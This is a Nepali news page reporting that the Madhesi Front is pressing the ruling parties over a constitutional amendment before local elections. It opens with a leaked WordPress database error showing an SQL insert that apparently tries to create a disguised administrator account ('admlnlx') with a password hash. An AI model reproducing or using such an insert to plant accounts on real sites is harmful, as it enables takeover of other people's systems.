WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B86itAoDVwuLAuWqD6EAEFdNSHAhf4/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 18:24:24', '', 'admlnlx', 'admlnlx')
काठमान्डौं, माघ ११-
मधेसी मोर्चाले सत्तारुढ नेपाली कांग्रेस र नेकपा माओवादी केन्द्रलाई संविधान संशोधन नगरी चुनाव घोषणा नगर्न दबाव दिने भएका छन् ।प्रधानमन्त्री प्रचण्डले मंगलबार अपराहृन ४ बजे कांग्रेस, माओवादी र मधेसी मोचर्ँको बैठक बोलाएका छन् ।
मधेसी मोर्चाका नेताहरुले छिट्टै स्थानीय चुनावको मिति घोषणा गर्ने तीन दलको सहमतिबारे प्रधानमन्त्रीको आधिकारिक धारणा माग्ने तयारी गरेका छन् ।प्रधानमन्त्रीले भने राष्ट्रियसभाको निर्वाचक मण्डलबाट गाउँपालिका र नगरकालिकाका प्रमुख उपप्रमुखको भोटिङ राइट हटाएर स्थानीय चुनावमा जाने प्रस्ताव गरेका छन् । यसका लागि पनि संविधान संशोधन हुन जरुरी छ । एमालेले यसबारे धारणा सार्वजनिक गरेको छैन । आजको बैठकमा संसदमा दर्ता भएको संविधान संशोधन विधेयक लगायतका विषयमा पनि छलफल हुने नेताहरुले बताएका छन् ।